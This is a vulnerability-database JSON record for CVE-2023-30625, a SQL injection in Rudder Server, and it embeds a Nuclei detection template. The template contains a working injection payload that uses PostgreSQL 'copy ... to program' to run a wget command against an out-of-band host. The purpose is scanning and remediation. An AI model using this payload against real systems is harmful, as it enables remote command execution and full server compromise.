{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-30625/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-30625/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-30625/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-30625/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-30625/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-30625"},"sightings":{"href":"/api/v1/sightings/cve-2023-30625"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-30625.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2023-30625\n\ninfo:\n  name: Rudder Server < 1.3.0-rc.1 - SQL Injection\n  author: gy741\n  severity: high\n  description: |\n    Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n  impact: |\n    Authenticated attackers can execute arbitrary SQL commands and potentially achieve remote code execution due to PostgreSQL superuser permissions, leading to complete database and server compromise.\n  remediation: |\n    Upgrade to Rudder Server version 1.3.0-rc.1 or later.\n  reference:\n    - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-30625\n    - http://packetstormsecurity.com/files/173837/Rudder-Server-SQL-Injection-Remote-Code-Execution.html\n    - https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30\n    - https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2023-30625\n    cwe-id: CWE-89\n    epss-score: 0.85825\n    epss-percentile: 0.99722\n    cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: rudderstack\n    product: rudder-server\n  tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli,vkev,vuln\nvariables:\n  cmd: \"wget {{interactsh-url}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /v1/warehouse/pending-events HTTP/1.1\n        Host: {{Hostname}}\n\n        {\"source_id\": \"test'; copy (SELECT '') to program '{{cmd}}'-- - \"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"error getting pending\"\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: status\n        status:\n          - 500\n# digest: 4b0a0048304602210098474410a20e2966a82e64101d4fb1457ec4acb1aa7ce60824e5a4c7a5f77b33022100cedc39427f9970a0145bded59f31e01fe55fc6954594f0e4e77d27eee2fb3660:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2023-30625"}